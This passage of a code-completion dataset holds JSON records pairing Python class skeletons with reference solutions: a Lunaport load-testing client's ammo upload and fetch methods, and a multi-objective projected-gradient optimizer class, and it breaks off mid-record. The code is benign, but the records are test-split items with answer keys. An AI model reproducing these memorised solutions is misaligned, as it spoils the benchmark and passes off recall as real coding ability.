Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. Throws: LunaportClientError\n\n<|skeleton|>\nclass Ammo:\n\n def ammo_get(self, ammo_id):\n \"\"\"Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError\"\"\"\n <|body_0|>\n\n def ammo_post(self, case, descr=None, files=None, data=None):\n \"\"\"Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. Throws: LunaportClientError\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n resp = None\n url = '{}ammo/{}'.format(self.epoint, ammo_id)\n try:\n resp = requests.get(url, timeout=self.to)\n resp.raise_for_status()\n return resp.json()\n except Exception as e:\n panic(e=e, resp=resp)\n<|end_body_0|>\n\n<|body_start_1|>\n resp = None\n codes_allowed = [201]\n url = '{}ammo/'.format(self.epoint)\n kw = {'data': {}}\n if files:\n kw.update({'files': files})\n elif data:\n kw.update({'data': data})\n else:\n raise ValueError('Malformed kw, define one of: `files` or `data`')\n kw['data'].update({'case': case, 'descr': descr})\n try:\n resp = requests.post(url, **kw)\n except Exception as e:\n panic(e=e, resp=resp)\n if resp.status_code not in codes_allowed:\n panic(resp=resp)\n return resp.json()\n<|end_body_1|>\n", "revision_id": "d22cad17536fb8931bf69956e45299cde8c1b8db", "skeleton": "<|skeleton|>\nclass Ammo:\n\n def ammo_get(self, ammo_id):\n \"\"\"Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError\"\"\"\n <|body_0|>\n\n def ammo_post(self, case, descr=None, files=None, data=None):\n \"\"\"Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. Throws: LunaportClientError\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Ammo:\n def ammo_get(self, ammo_id):\n \"\"\"Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError\"\"\"\n resp = None\n url = '{}ammo/{}'.format(self.epoint, ammo_id)\n try:\n resp = requests.get(url, timeout=self.to)\n resp.raise_for_status()\n return resp.json()\n except Exception as e:\n panic(e=e, resp=resp)\n\n def ammo_post(self, case, descr=None, files=None, data=None):\n \"\"\"Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. Throws: LunaportClientError\"\"\"\n resp = None\n codes_allowed = [201]\n url = '{}ammo/'.format(self.epoint)\n kw = {'data': {}}\n if files:\n kw.update({'files': files})\n elif data:\n kw.update({'data': data})\n else:\n raise ValueError('Malformed kw, define one of: `files` or `data`')\n kw['data'].update({'case': case, 'descr': descr})\n try:\n resp = requests.post(url, **kw)\n except Exception as e:\n panic(e=e, resp=resp)\n if resp.status_code not in codes_allowed:\n panic(resp=resp)\n return resp.json()\n", "source": "the_stack_v2_python_sparse", "source_path": "lunaport_client/mix_ammo.py", "source_repo": "maklaut/lunaport_client", "split": "test", "star_events_count": 0} {"blob_id": "57944741f0580df5d3dc537f7e1e1d655b51f054", "bodies": ["GradientBasedAlgorithm.__init__(self, max_iter, max_time, max_f_evals, False, 0, False, False, 0, theta_tol, gurobi, gurobi_method, gurobi_verbose, ALS_alpha_0, ALS_delta, ALS_beta, ALS_min_alpha, name_DDS='Boundconstrained_Projected_Gradient_DDS', name_ALS='BoundconstrainedFrontALS')\nself.__theta_array = np.array([-np.inf], dtype=float)\nGradientBasedAlgorithm.add_stopping_condition(self, 'theta_tolerance', theta_tol, self.__theta_array[0], equal_required=True)\nself.__alpha_array = np.array([1], dtype=float)\nGradientBasedAlgorithm.add_stopping_condition(self, 'min_alpha', 0, self.__alpha_array[0], smaller_value_required=True, equal_required=True)", "n, m = (p_list.shape[1], f_list.shape[1])\nindex_point = index_initial_point\nwhile not self.evaluate_stopping_conditions():\n n_iteration = self.get_stopping_condition_current_value('max_iter')\n J = problem.evaluate_functions_jacobian(p_list[index_point, :])\n self.add_to_stopping_condition_current_value('max_f_evals', n)\n if self.evaluate_stopping_conditions():\n break\n v, theta = self._direction_solver.compute_direction(problem, J[I,], x_p=p_list[index_point, :])\n self.__theta_array[n_iteration] = theta\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration])\n if theta < self._theta_tol:\n new_p, new_f, alpha, f_eval_ls = self._line_search.search(problem, p_list[index_point, :], f_list, v, theta, np.array(list(I)))\n self.add_to_stopping_condition_current_value('max_f_evals', f_eval_ls)\n self.__alpha_array[n_iteration] = alpha\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration])\n if new_p is not None:\n p_list = np.concatenate((p_list, new_p.reshape((1, n))), axis=0)\n f_list = np.concatenate((f_list, new_f.reshape((1, m))), axis=0)\n index_point = p_list.shape[0] - 1\n self.__theta_array = np.concatenate((self.__theta_array, np.array([-np.inf])), axis=0)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration + 1])\n self.__alpha_array = np.concatenate((self.__alpha_array, np.array([1])), axis=0)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration + 1])\n self.add_to_stopping_condition_current_value('max_iter', 1)\nreturn (p_list, f_list, self.__theta_array)", "self.update_stopping_condition_current_value('max_iter', 0)\nself._theta_tol = theta_tol\nself.__theta_array = np.array([-np.inf], dtype=float)\nself.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[0])\nself.update_stopping_condition_reference_value('theta_tolerance', theta_tol)\nself.__alpha_array = np.array([1], dtype=float)\nself.update_stopping_condition_current_value('min_alpha', self.__alpha_array[0])"], "bodies_text": "<|body_start_0|>\n GradientBasedAlgorithm.__init__(self, max_iter, max_time, max_f_evals, False, 0, False, False, 0, theta_tol, gurobi, gurobi_method, gurobi_verbose, ALS_alpha_0, ALS_delta, ALS_beta, ALS_min_alpha, name_DDS='Boundconstrained_Projected_Gradient_DDS', name_ALS='BoundconstrainedFrontALS')\n self.__theta_array = np.array([-np.inf], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'theta_tolerance', theta_tol, self.__theta_array[0], equal_required=True)\n self.__alpha_array = np.array([1], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'min_alpha', 0, self.__alpha_array[0], smaller_value_required=True, equal_required=True)\n<|end_body_0|>\n\n<|body_start_1|>\n n, m = (p_list.shape[1], f_list.shape[1])\n index_point = index_initial_point\n while not self.evaluate_stopping_conditions():\n n_iteration = self.get_stopping_condition_current_value('max_iter')\n J = problem.evaluate_functions_jacobian(p_list[index_point, :])\n self.add_to_stopping_condition_current_value('max_f_evals', n)\n if self.evaluate_stopping_conditions():\n break\n v, theta = self._direction_solver.compute_direction(problem, J[I,], x_p=p_list[index_point, :])\n self.__theta_array[n_iteration] = theta\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration])\n if theta < self._theta_tol:\n new_p, new_f, alpha, f_eval_ls = self._line_search.search(problem, p_list[index_point, :], f_list, v, theta, np.array(list(I)))\n self.add_to_stopping_condition_current_value('max_f_evals', f_eval_ls)\n self.__alpha_array[n_iteration] = alpha\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration])\n if new_p is not None:\n p_list = np.concatenate((p_list, new_p.reshape((1, n))), axis=0)\n f_list = np.concatenate((f_list, new_f.reshape((1, m))), axis=0)\n index_point = p_list.shape[0] - 1\n self.__theta_array = np.concatenate((self.__theta_array, np.array([-np.inf])), axis=0)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration + 1])\n self.__alpha_array = np.concatenate((self.__alpha_array, np.array([1])), axis=0)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration + 1])\n self.add_to_stopping_condition_current_value('max_iter', 1)\n return (p_list, f_list, self.__theta_array)\n<|end_body_1|>\n\n<|body_start_2|>\n self.update_stopping_condition_current_value('max_iter', 0)\n self._theta_tol = theta_tol\n self.__theta_array = np.array([-np.inf], dtype=float)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[0])\n self.update_stopping_condition_reference_value('theta_tolerance', theta_tol)\n self.__alpha_array = np.array([1], dtype=float)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[0])\n<|end_body_2|>\n", "class_docstring": "The Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.", "class_name": "FMOPG", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FMOPG:\n \"\"\"The Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.\"\"\"\n\n def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None):\n \"\"\"Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i\"\"\"\n <|body_0|>\n\n def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None):\n \"\"\"Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin\"\"\"\n <|body_1|>\n\n def reset_stopping_conditions_current_values(self, theta_tol: float):\n \"\"\"Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n GradientBasedAlgorithm.__init__(self, max_iter, max_time, max_f_evals, False, 0, False, False, 0, theta_tol, gurobi, gurobi_method, gurobi_verbose, ALS_alpha_0, ALS_delta, ALS_beta, ALS_min_alpha, name_DDS='Boundconstrained_Projected_Gradient_DDS', name_ALS='BoundconstrainedFrontALS')\n self.__theta_array = np.array([-np.inf], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'theta_tolerance', theta_tol, self.__theta_array[0], equal_required=True)\n self.__alpha_array = np.array([1], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'min_alpha', 0, self.__alpha_array[0], smaller_value_required=True, equal_required=True)\n<|end_body_0|>\n\n<|body_start_1|>\n n, m = (p_list.shape[1], f_list.shape[1])\n index_point = index_initial_point\n while not self.evaluate_stopping_conditions():\n n_iteration = self.get_stopping_condition_current_value('max_iter')\n J = problem.evaluate_functions_jacobian(p_list[index_point, :])\n self.add_to_stopping_condition_current_value('max_f_evals', n)\n if self.evaluate_stopping_conditions():\n break\n v, theta = self._direction_solver.compute_direction(problem, J[I,], x_p=p_list[index_point, :])\n self.__theta_array[n_iteration] = theta\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration])\n if theta < self._theta_tol:\n new_p, new_f, alpha, f_eval_ls = self._line_search.search(problem, p_list[index_point, :], f_list, v, theta, np.array(list(I)))\n self.add_to_stopping_condition_current_value('max_f_evals', f_eval_ls)\n self.__alpha_array[n_iteration] = alpha\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration])\n if new_p is not None:\n p_list = np.concatenate((p_list, new_p.reshape((1, n))), axis=0)\n f_list = np.concatenate((f_list, new_f.reshape((1, m))), axis=0)\n index_point = p_list.shape[0] - 1\n self.__theta_array = np.concatenate((self.__theta_array, np.array([-np.inf])), axis=0)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration + 1])\n self.__alpha_array = np.concatenate((self.__alpha_array, np.array([1])), axis=0)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration + 1])\n self.add_to_stopping_condition_current_value('max_iter', 1)\n return (p_list, f_list, self.__theta_array)\n<|end_body_1|>\n\n<|body_start_2|>\n self.update_stopping_condition_current_value('max_iter', 0)\n self._theta_tol = theta_tol\n self.__theta_array = np.array([-np.inf], dtype=float)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[0])\n self.update_stopping_condition_reference_value('theta_tolerance', theta_tol)\n self.__alpha_array = np.array([1], dtype=float)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[0])\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000192", "length_bytes": 8167, "license_type": "permissive", "methods": [{"docstring": "Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i", "name": "__init__", "signature": "def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None)"}, {"docstring": "Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin", "name": "search", "signature": "def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None)"}, {"docstring": "Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.", "name": "reset_stopping_conditions_current_values", "signature": "def reset_stopping_conditions_current_values(self, theta_tol: float)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_003131", "prompt": "Implement the Python class `FMOPG` described below.\n\nClass description:\nThe Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.\n\nMethod signatures and docstrings:\n- def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None): Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i\n- def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None): Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin\n- def reset_stopping_conditions_current_values(self, theta_tol: float): Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.", "prompted_full_text": "Implement the Python class `FMOPG` described below.\n\nClass description:\nThe Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.\n\nMethod signatures and docstrings:\n- def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None): Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i\n- def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None): Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin\n- def reset_stopping_conditions_current_values(self, theta_tol: float): Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.\n\n<|skeleton|>\nclass FMOPG:\n \"\"\"The Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.\"\"\"\n\n def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None):\n \"\"\"Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i\"\"\"\n <|body_0|>\n\n def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None):\n \"\"\"Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin\"\"\"\n <|body_1|>\n\n def reset_stopping_conditions_current_values(self, theta_tol: float):\n \"\"\"Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n GradientBasedAlgorithm.__init__(self, max_iter, max_time, max_f_evals, False, 0, False, False, 0, theta_tol, gurobi, gurobi_method, gurobi_verbose, ALS_alpha_0, ALS_delta, ALS_beta, ALS_min_alpha, name_DDS='Boundconstrained_Projected_Gradient_DDS', name_ALS='BoundconstrainedFrontALS')\n self.__theta_array = np.array([-np.inf], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'theta_tolerance', theta_tol, self.__theta_array[0], equal_required=True)\n self.__alpha_array = np.array([1], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'min_alpha', 0, self.__alpha_array[0], smaller_value_required=True, equal_required=True)\n<|end_body_0|>\n\n<|body_start_1|>\n n, m = (p_list.shape[1], f_list.shape[1])\n index_point = index_initial_point\n while not self.evaluate_stopping_conditions():\n n_iteration = self.get_stopping_condition_current_value('max_iter')\n J = problem.evaluate_functions_jacobian(p_list[index_point, :])\n self.add_to_stopping_condition_current_value('max_f_evals', n)\n if self.evaluate_stopping_conditions():\n break\n v, theta = self._direction_solver.compute_direction(problem, J[I,], x_p=p_list[index_point, :])\n self.__theta_array[n_iteration] = theta\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration])\n if theta < self._theta_tol:\n new_p, new_f, alpha, f_eval_ls = self._line_search.search(problem, p_list[index_point, :], f_list, v, theta, np.array(list(I)))\n self.add_to_stopping_condition_current_value('max_f_evals', f_eval_ls)\n self.__alpha_array[n_iteration] = alpha\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration])\n if new_p is not None:\n p_list = np.concatenate((p_list, new_p.reshape((1, n))), axis=0)\n f_list = np.concatenate((f_list, new_f.reshape((1, m))), axis=0)\n index_point = p_list.shape[0] - 1\n self.__theta_array = np.concatenate((self.__theta_array, np.array([-np.inf])), axis=0)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration + 1])\n self.__alpha_array = np.concatenate((self.__alpha_array, np.array([1])), axis=0)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration + 1])\n self.add_to_stopping_condition_current_value('max_iter', 1)\n return (p_list, f_list, self.__theta_array)\n<|end_body_1|>\n\n<|body_start_2|>\n self.update_stopping_condition_current_value('max_iter', 0)\n self._theta_tol = theta_tol\n self.__theta_array = np.array([-np.inf], dtype=float)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[0])\n self.update_stopping_condition_reference_value('theta_tolerance', theta_tol)\n self.__alpha_array = np.array([1], dtype=float)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[0])\n<|end_body_2|>\n", "revision_id": "22610b3dbc308fe89309ac99204992feac048908", "skeleton": "<|skeleton|>\nclass FMOPG:\n \"\"\"The Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.\"\"\"\n\n def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None):\n \"\"\"Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i\"\"\"\n <|body_0|>\n\n def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None):\n \"\"\"Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin\"\"\"\n <|body_1|>\n\n def reset_stopping_conditions_current_values(self, theta_tol: float):\n \"\"\"Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FMOPG:\n \"\"\"The Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.\"\"\"\n\n def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None):\n \"\"\"Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i\"\"\"\n GradientBasedAlgorithm.__init__(self, max_iter, max_time, max_f_evals, False, 0, False, False, 0, theta_tol, gurobi, gurobi_method, gurobi_verbose, ALS_alpha_0, ALS_delta, ALS_beta, ALS_min_alpha, name_DDS='Boundconstrained_Projected_Gradient_DDS', name_ALS='BoundconstrainedFrontALS')\n self.__theta_array = np.array([-np.inf], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'theta_tolerance', theta_tol, self.__theta_array[0], equal_required=True)\n self.__alpha_array = np.array([1], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'min_alpha', 0, self.__alpha_array[0], smaller_value_required=True, equal_required=True)\n\n def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None):\n \"\"\"Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin\"\"\"\n n, m = (p_list.shape[1], f_list.shape[1])\n index_point = index_initial_point\n while not self.evaluate_stopping_conditions():\n n_iteration = self.get_stopping_condition_current_value('max_iter')\n J = problem.evaluate_functions_jacobian(p_list[index_point, :])\n self.add_to_stopping_condition_current_value('max_f_evals', n)\n if self.evaluate_stopping_conditions():\n break\n v, theta = self._direction_solver.compute_direction(problem, J[I,], x_p=p_list[index_point, :])\n self.__theta_array[n_iteration] = theta\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration])\n if theta < self._theta_tol:\n new_p, new_f, alpha, f_eval_ls = self._line_search.search(problem, p_list[index_point, :], f_list, v, theta, np.array(list(I)))\n self.add_to_stopping_condition_current_value('max_f_evals', f_eval_ls)\n self.__alpha_array[n_iteration] = alpha\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration])\n if new_p is not None:\n p_list = np.concatenate((p_list, new_p.reshape((1, n))), axis=0)\n f_list = np.concatenate((f_list, new_f.reshape((1, m))), axis=0)\n index_point = p_list.shape[0] - 1\n self.__theta_array = np.concatenate((self.__theta_array, np.array([-np.inf])), axis=0)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration + 1])\n self.__alpha_array = np.concatenate((self.__alpha_array, np.array([1])), axis=0)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration + 1])\n self.add_to_stopping_condition_current_value('max_iter', 1)\n return (p_list, f_list, self.__theta_array)\n\n def reset_stopping_conditions_current_values(self, theta_tol: float):\n \"\"\"Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.\"\"\"\n self.update_stopping_condition_current_value('max_iter', 0)\n self._theta_tol = theta_tol\n self.__theta_array = np.array([-np.inf], dtype=float)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[0])\n self.update_stopping_condition_reference_value('theta_tolerance', theta_tol)\n self.__alpha_array = np.array([1], dtype=float)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[0])\n", "source": "the_stack_v2_python_sparse", "source_path": "algorithms/gradient_based/local_search_algorithms/fmopg.py", "source_repo": "pierlumanzu/nsma", "split": 